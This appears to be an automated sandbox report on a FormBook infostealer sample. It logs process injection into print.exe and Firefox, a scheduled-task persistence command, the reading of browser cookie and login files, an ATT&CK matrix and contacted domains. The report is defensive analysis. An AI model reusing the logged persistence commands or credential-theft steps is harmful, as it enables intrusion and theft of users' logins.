                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtReadFile: Direct from: 0x76EF2ADC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtDelayExecution: Direct from: 0x76EF2DDC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtResumeThread: Direct from: 0x76EF2FBC
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtCreateUserProcess: Direct from: 0x76EF371C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtOpenKeyEx: Direct from: 0x76EF3C9C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtSetInformationThread: Direct from: 0x76EE63F9
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtClose: Direct from: 0x76EF2B6C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtSetInformationThread: Direct from: 0x76EF2B4C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe NtCreateKey: Direct from: 0x76EF2C6C
                    Source: C:\Windows\SysWOW64\print.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF79F9E0000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: NULL target: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: NULL target: C:\Windows\SysWOW64\print.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\print.exe Section loaded: NULL target: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe protection: read write
                    Source: C:\Windows\SysWOW64\print.exe Section loaded: NULL target: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\print.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                    Source: C:\Windows\SysWOW64\print.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\print.exe Thread APC queued: target process: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                    Source: C:\Windows\SysWOW64\print.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF79F9E0000
                    Source: C:\Users\user\Desktop\UnmxRI.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp"
                    Source: C:\Users\user\Desktop\UnmxRI.exe Process created: C:\Users\user\Desktop\UnmxRI.exe "C:\Users\user\Desktop\UnmxRI.exe"
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp"
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Process created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe Process created: C:\Windows\SysWOW64\print.exe "C:\Windows\SysWOW64\print.exe"
                    Source: C:\Windows\SysWOW64\print.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4495132332.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152516352.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495197692.0000000001691000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
                    Source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4495132332.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152516352.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495197692.0000000001691000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                    Source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4495132332.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152516352.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495197692.0000000001691000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                    Source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4495132332.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152516352.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495197692.0000000001691000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\UnmxRI.exe Queries volume information: C:\Users\user\Desktop\UnmxRI.exe VolumeInformation
                    Source: C:\Users\user\Desktop\UnmxRI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UnmxRI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UnmxRI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UnmxRI.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UnmxRI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeQueries volume information: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: C:\Windows\SysWOW64\print.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Windows\SysWOW64\print.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\print.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\SysWOW64\print.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\print.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\print.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                    Source: C:\Windows\SysWOW64\print.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                    Source: C:\Windows\SysWOW64\print.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\print.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                    Remote Access Functionality

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                    [Behavior graph. ID: 1501599, Sample: UnmxRI.exe, Startdate: 30/08/2024, Architecture: WINDOWS, Score: 100]

                    SourceDetectionScannerLabelLink
                    UnmxRI.exe66%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                    UnmxRI.exe69%VirustotalBrowse
                    UnmxRI.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe66%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    gpcamservices.com8%VirustotalBrowse
                    www.otomain.info0%VirustotalBrowse
                    www.sportspaj.com6%VirustotalBrowse
                    www.theranchobizarro.com1%VirustotalBrowse
                    nexgen-gaming.com10%VirustotalBrowse
                    noobblaster.com8%VirustotalBrowse
                    www.mlfloor.net1%VirustotalBrowse
                    www.7789552398763.net3%VirustotalBrowse
                    parkingpage.namecheap.com0%VirustotalBrowse
                    www.nathanladd.software7%VirustotalBrowse
                    www.gpcamservices.com10%VirustotalBrowse
                    www.pheonix-travels.com7%VirustotalBrowse
                    www.sciencebot.sbs2%VirustotalBrowse
                    www.noobblaster.com6%VirustotalBrowse
                    www.nexgen-gaming.com3%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    Name  IP  Active  Malicious  Antivirus Detection  Reputation
                                Name  Malicious  Antivirus Detection  Reputation
                                Name  Source  Malicious  Antivirus Detection  Reputation
                                http://www.theranchobizarro.com/build/css/compiled/backend/backend-f2bf381915.cssprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.listingzen.com/print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.ecosia.org/newtab/print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.theranchobizarro.com/faqprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.theranchobizarro.com/registerNUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.cloudflare.com/5xx-error-landingprint.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://ac.ecosia.org/autocomplete?q=print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.theranchobizarro.com/profileprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.hover.com/tos?source=parkedprint.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.cloudflare.com/5xx-error-landing/print.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.theranchobizarro.com/assets/jquery/dist/jquery.min.jsprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.ListingZen.comprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://s3-us-west-2.amazonaws.com/listingzen/vendors/vendor2/450/vendor1472074370.jpgprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
